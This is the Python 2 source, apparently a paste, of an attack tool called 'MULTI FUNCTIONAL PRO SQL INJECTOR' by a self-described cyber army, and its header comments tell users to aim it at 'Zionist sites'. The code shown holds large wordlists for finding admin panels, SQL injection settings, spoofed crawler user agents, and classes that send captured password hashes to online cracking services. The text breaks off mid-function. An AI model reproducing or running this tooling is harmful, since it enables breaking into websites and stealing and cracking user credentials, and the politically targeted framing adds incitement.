[PYTHON] MULTI FUNCTIONAL PRO SQL INJECTOR

1. ==================================================================
2. YOUTUBE: https://www.youtube.com/channel/UC5DPee5R7vtFytLZAGRNg4A
3. PAGE: https://www.facebook.com/Middle.East.Cyber.Army.5
4. TWITTER: https://twitter.com/MiddleEastCybe2
5. ==================================================================
6. #In The  Name Of Allah
7. #!user/bin/python 2.7
8. #This Tool Is Coded By RebelGhost Dx !
9. #We Are MECA Team (Middle East Cyber Army )
10. #USE IT ONLY AGAIN ZIONIST SITES !!!
11. #Free Gaza Free Palastine
12. #INSHAELLAH  WE HELP U  WITH THIS TOOL
13. #THIS MECA AGAIN BROO ;)
14.  
15. try:
16.     from time import gmtime, strftime
17.     import urllib, sys, re, os, socket, httplib, urllib2, time, random
18.     import hashlib
19.     import urllib2
20.     import getopt
21.     from os import path
22.     from urllib import urlencode
23.     from re import search, findall
24.     from random import seed, randint
25.     from base64 import decodestring, encodestring
26.     from cookielib import LWPCookieJar
27. except ImportError:
28.     print """
29. Execution Error:
30.  
31.  You required some basic Python libraries.
32.  
33.  This application use: sys, hashlib, urllib, urllib2, os, re, random, getopt, base64 , socket, httplib, time, random  and cookielib.
34.  
35.  Please, check if you have all of them installed in your system.
36.  
37. """
38.     sys.exit(1)
39.  
40.  
41. php = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
42. 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
43. 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
44. 'admin_area/index.php','articles/connexion.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
45. 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
46. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
47. 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
48. 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
49. 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
50. 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
51. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
52. 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
53. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
54. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
55. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
56. 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
57. 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
58. 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
59. 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php']
60.  
61. jerar=[]
62. MD4 = "md4"
63. MD5     = "md5"
64. SHA1    = "sha1"
65. SHA224  = "sha224"
66. SHA256  = "sha256"
67. SHA384  = "sha384"
68. SHA512  = "sha512"
69. RIPEMD  = "rmd160"
70. LM  = "lm"
71. NTLM    = "ntlm"
72. MYSQL   = "mysql"
73. CISCO7  = "cisco7"
74. JUNIPER = "juniper"
75. GOST    = "gost"
76. a=0
77. cgi = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
78. 'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi',
79. 'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
80. 'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html',
81. 'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
82. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
83. 'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi',
84. 'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi',
85. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi',
86. 'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi',
87. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html',
88. 'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html',
89. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
90. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
91. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html',
92. 'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi',
93. 'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi',
94. 'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi',
95. 'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi']
96. var1=0
97. var2=0
98. WHIRLPOOL = "whirlpool"
99. LDAP_MD5 = "ldap_md5"
100. LDAP_SHA1 = "ldap_sha1"
101. hashvalue = None
102. hashfile  = None
103. googlesearch = False
104. arg_end = "--"
105. arg_eva = "+"
106. colMax = 200
107. hash = ''
108. brf = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
109. 'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf',
110. 'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
111. 'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html',
112. 'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
113. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
114. 'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brfbrf','admin/admin_login.brf','admin_login.brf',
115. 'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf',
116. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf',
117. 'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf',
118. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html',
119. 'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html',
120. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
121. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
122. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html',
123. 'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf',
124. 'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf',
125. 'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf',
126. 'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf']
127.  
128. socket.setdefaulttimeout(10)
129. logfile = "PRO_INJECTOR.log"
130. tablefuzz = "tablesfuzz.txt"
131. columnfuzz = "columnsfuzz.txt"
132. loadfilefuzz = "loadfilefuzz.txt"
133.  
134. asp = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
135. 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
136. 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
137. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
138. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
139. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
140. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
141. 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
142. 'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
143. 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
144. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
145. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
146. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
147. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
148. 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
149. 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
150. 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
151. 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
152. 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html']
153.  
154. algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
155.  
156. USER_AGENTS = [
157.     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 1.0.5)",
158.     "curl/7.7.2 (powerpc-apple-darwin6.0) libcurl 7.7.2 (OpenSSL 0.9.6b)",
159.     "Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
160.     "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre",
161.     "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
162.     "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)",
163.     "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205",
164.     "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)",
165.     "Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01",
166.     "Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00",
167.     "Opera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61",
168.     "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2",
169.     "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2",
170.     "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.812.0 Safari/535.1",
171.     "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.     ]
173.  
174. cfm = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
175. 'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm',
176. 'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
177. 'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html',
178. 'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
179. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
180. 'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm',
181. 'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm',
182. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm',
183. 'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm',
184. 'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html',
185. 'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html',
186. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
187. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
188. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html',
189. 'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm',
190. 'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm',
191. 'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm',
192. 'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm']
193. RebelG=[]
194. site = ""
195. proxy = "None"
196. arg_string = ""
197. arg_blind = "--union"
198. arg_table = "None"
199. arg_database = "None"
200. arg_columns = "None"
201. arg_row = "Rows"
202. arg_cookie = "None"
203. arg_insert = "None"
204. arg_where = ""
205. arg_orderby = ""
206. arg_debug = "off"
207. arg_rowdisp = 1
208. arg_adminusers = 10
209. arg_wordlist = ""
210. arg_ssl = "off"
211. arg_proxy_auth = ""
212. MECA = "concat(0x1e,0x1e,"
213. mode = "None"
214. lower_bound = 0
215. upper_bound = 16069
216. line_URL = ""
217. count_URL = ""
218. cur_db = ""
219. cur_table = ""
220. terminal = ""
221. count = 0
222. gets = 0
223. table_num = 0
224. num = 0
225. ser_ver = 3
226. version =[]
227. let_pos = 1
228. lim_num = 0
229. agent = ""
230. ip = ""
231. Dork = ''
232.  
233. class SCHWETT:
234.    
235.     name =      "schwett"
236.     url =       "http://schwett.com"
237.     supported_algorithm = [MD5]
238.    
239.     def isSupported (self, alg):
240.        
241.        
242.         if alg in self.supported_algorithm:
243.             return True
244.         else:
245.             return False
246.  
247.  
248.     def crack (self, hashvalue, alg):
249.        
250.        
251.         if not self.isSupported (alg):
252.             return None
253.        
254.         url = "http://schwett.com/md5/index.php?md5value=%s&md5c=Hash+Match" % (hashvalue)
255.        
256.         response = do_HTTP_request ( url )
257.        
258.         html = None
259.         if response:
260.             html = response.read()
261.         else:
262.             return None
263.        
264.         match = search (r"<h3><font color='red'>No Match Found</font></h3><br />", html)
265.         if match:
266.             return None
267.         else:
268.             return "The hash is broken, please contact with La X marca el lugar and send it the hash value to add the correct regexp."
269.  
270.  
271. class NETMD5CRACK:
272.  
273.     name =      "netmd5crack"
274.     url =       "http://www.netmd5crack.com"
275.     supported_algorithm = [MD5]
276.    
277.     def isSupported (self, alg):
278.        
279.        
280.        
281.         if alg in self.supported_algorithm:
282.             return True
283.         else:
284.             return False
285.  
286.  
287.     def crack (self, hashvalue, alg):
288.        
289.        
290.        
291.        
292.         if not self.isSupported (alg):
293.             return None
294.        
295.         url = "http://www.netmd5crack.com/cgi-bin/Crack.py?InputHash=%s" % (hashvalue)
296.        
297.         response = do_HTTP_request ( url )
298.        
299.         html = None
300.         if response:
301.             html = response.read()
302.         else:
303.             return None
304.        
305.         regexp = r'<tr><td class="border">%s</td><td class="border">[^<]*</td></tr></table>' % (hashvalue)
306.         match = search (regexp, html)
307.        
308.         if match:
309.             match2 = search ( "Sorry, we don't have that hash in our database", match.group() )
310.             if match2:
311.                 return None
312.             else:
313.                 return match.group().split('border')[2].split('<')[0][2:]
314.  
315.  
316.  
317. class MD5_CRACKER:
318.    
319.     name =      "md5-cracker"
320.     url =       "http://www.md5-cracker.tk"
321.     supported_algorithm = [MD5]
322.    
323.     def isSupported (self, alg):
324.        
325.        
326.        
327.         if alg in self.supported_algorithm:
328.             return True
329.         else:
330.             return False
331.  
332.  
333.     def crack (self, hashvalue, alg):
334.        
335.        
336.        
337.        
338.        
339.         if not self.isSupported (alg):
340.             return None
341.        
342.        
343.         url = "http://www.md5-cracker.tk/xml.php?md5=%s" % (hashvalue)
344.        
345.        
346.         response = do_HTTP_request ( url )
347.        
348.        
349.         if response:
350.             try:
351.                 doc = parseDoc ( response.read() )
352.             except:
353.                 print "INFO: You need libxml2 to use this plugin."
354.                 return None
355.         else:
356.             return None
357.        
358.         result = doc.xpathEval("//data")
359.         if len(result):
360.             return result[0].content
361.         else:
362.             return None
363.  
364.  
365. class BENRAMSEY:
366.    
367.     name =      "benramsey"
368.     url =       "http://tools.benramsey.com"
369.     supported_algorithm = [MD5]
370.    
371.     def isSupported (self, alg):
372.        
373.        
374.        
375.         if alg in self.supported_algorithm:
376.             return True
377.         else:
378.             return False
379.  
380.  
381.     def crack (self, hashvalue, alg):
382.        
383.        
384.        
385.        
386.        
387.         if not self.isSupported (alg):
388.             return None
389.        
390.        
391.         url = "http://tools.benramsey.com/md5/md5.php?hash=%s" % (hashvalue)
392.        
393.        
394.         response = do_HTTP_request ( url )
395.        
396.        
397.         html = None
398.         if response:
399.             html = response.read()
400.         else:
401.             return None
402.            
403.         match = search (r'<string><!\[CDATA\[[^\]]*\]\]></string>', html)
404.        
405.         if match:
406.             return match.group().split(']')[0][17:]
407.         else:
408.             return None
409.  
410.  
411.  
412. class GROMWEB:
413.    
414.     name =      "gromweb"
415.     url =       "http://md5.gromweb.com"
416.     supported_algorithm = [MD5]
417.    
418.     def isSupported (self, alg):
419.        
420.        
421.        
422.         if alg in self.supported_algorithm:
423.             return True
424.         else:
425.             return False
426.  
427.  
428.     def crack (self, hashvalue, alg):
429.        
430.        
431.        
432.        
433.        
434.         if not self.isSupported (alg):
435.             return None
436.        
437.        
438.         url = "http://md5.gromweb.com/query/%s" % (hashvalue)
439.        
440.        
441.         response = do_HTTP_request ( url )
442.        
443.        
444.         if response:
445.             return response.read()
446.            
447.         return response
448.        
449.        
450.  
451.  
452. class HASHCRACKING:
453.    
454.     name =      "hashcracking"
455.     url =       "http://md5.hashcracking.com"
456.     supported_algorithm = [MD5]
457.    
458.     def isSupported (self, alg):
459.        
460.        
461.        
462.         if alg in self.supported_algorithm:
463.             return True
464.         else:
465.             return False
466.  
467.  
468.     def crack (self, hashvalue, alg):
469.        
470.        
471.        
472.        
473.        
474.         if not self.isSupported (alg):
475.             return None
476.        
477.        
478.         url = "http://md5.hashcracking.com/search.php?md5=%s" % (hashvalue)
479.        
480.        
481.         response = do_HTTP_request ( url )
482.        
483.        
484.         html = None
485.         if response:
486.             html = response.read()
487.         else:
488.             return None
489.        
490.         match = search (r'\sis.*', html)
491.        
492.         if match:
493.             return match.group()[4:]
494.            
495.         return None
496.  
497.  
498.  
499. class VICTOROV:
500.    
501.     name =      "hashcracking"
502.     url =       "http://victorov.su"
503.     supported_algorithm = [MD5]
504.    
505.     def isSupported (self, alg):
506.        
507.        
508.        
509.         if alg in self.supported_algorithm:
510.             return True
511.         else:
512.             return False
513.  
514.  
515.     def crack (self, hashvalue, alg):
516.        
517.        
518.        
519.        
520.        
521.         if not self.isSupported (alg):
522.             return None
523.        
524.        
525.         url = "http://victorov.su/md5/?md5e=&md5d=%s" % (hashvalue)
526.        
527.        
528.         response = do_HTTP_request ( url )
529.        
530.        
531.         html = None
532.         if response:
533.             html = response.read()
534.         else:
535.             return None
536.        
537.         match = search (r': <b>[^<]*</b><br><form action="">', html)
538.        
539.         if match:
540.             return match.group().split('b>')[1][:-2]
541.            
542.         return None
543.  
544.  
545. class THEKAINE:
546.    
547.     name =      "thekaine"
548.     url =       "http://md5.thekaine.de"
549.     supported_algorithm = [MD5]
550.    
551.     def isSupported (self, alg):
552.        
553.        
554.        
555.         if alg in self.supported_algorithm:
556.             return True
557.         else:
558.             return False
559.  
560.  
561.     def crack (self, hashvalue, alg):
562.        
563.        
564.        
565.        
566.        
567.         if not self.isSupported (alg):
568.             return None
569.        
570.        
571.         url = "http://md5.thekaine.de/?hash=%s" % (hashvalue)
572.        
573.        
574.         response = do_HTTP_request ( url )
575.        
576.        
577.         html = None
578.         if response:
579.             html = response.read()
580.         else:
581.             return None
582.        
583.         match = search (r'<td colspan="2"><br><br><b>[^<]*</b></td><td></td>', html)
584.        
585.         if match:
586.            
587.             match2 = search (r'not found', match.group() )
588.            
589.             if match2:
590.                 return None
591.             else:
592.                 return match.group().split('b>')[1][:-2]
593.            
594.  
595.  
596. class TMTO:
597.    
598.     name =      "tmto"
599.     url =       "http://www.tmto.org"
600.     supported_algorithm = [MD5]
601.    
602.     def isSupported (self, alg):
603.        
604.        
605.        
606.         if alg in self.supported_algorithm:
607.             return True
608.         else:
609.             return False
610.  
611.  
612.     def crack (self, hashvalue, alg):
613.        
614.        
615.        
616.        
617.        
618.         if not self.isSupported (alg):
619.             return None
620.        
621.        
622.         url = "http://www.tmto.org/api/latest/?hash=%s&auth=true" % (hashvalue)
623.        
624.        
